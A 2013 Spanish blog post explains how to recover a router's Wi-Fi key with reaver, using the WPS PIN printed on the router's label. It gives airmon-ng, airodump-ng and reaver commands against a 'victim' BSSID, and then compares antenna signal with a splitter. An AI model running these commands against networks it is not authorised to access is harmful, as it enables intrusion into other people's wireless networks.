viernes, 29 de marzo de 2013

Sacar clave de un router teniendo acceso físico (reaver)

Si tienes acceso físico a un router pero no sabes la clave y tampoco quieres resetearlo entonces puedes usar reaver para descubrirla.
En la parte de atras del router (o en su caja) por lo general hay una etiqueta que indica el PIN del WPS. Este número es el que vamos a usar para conseguir la clave.





Esta prueba fue hecha usando backtrack. Pero puedes usar cualquier distro.

1- Primero debes poner tu tarjeta en modo monitor

airmon-ng start wlan0

2- Busca el bssid y el canal del router victima:
airodump-ng mon0


3- Por ultimo ejecuta reaver, el pin es el que viste en el reverso del router

reaver -i mon0 -b BSSID -c CANAL -p PIN –vv

Ejemplo (BSSID=F8:E1:21:35:26:0C ; CANAL=4 ; PIN=17057414):

reaver -i mon0 -b F8:E1:21:35:26:0C -c 4 -p 17057414 –vv


--------------------------------------------------------------------------------------

Estas son capturas de las dos únicas pruebas que he realizado (ambas exitosas):



Se puede notar que sacaron la clave en solo 3 segundos!

Prueba Alfa AWUS036NHR + splitter

Esta es una prueba de un Alfa AWUS036NHR (2W). Veremos la variación de la señal con la antena de serie vs la señal de dos antenas colocadas con un splitter.


Caso 1: Alfa + Antena por defecto:



Caso 2: Alfa + Splitter ( Antena por defecto + Antenna TP-Link 8db)




Podemos ver que el aumento fue significativo pero nada del otro mundo.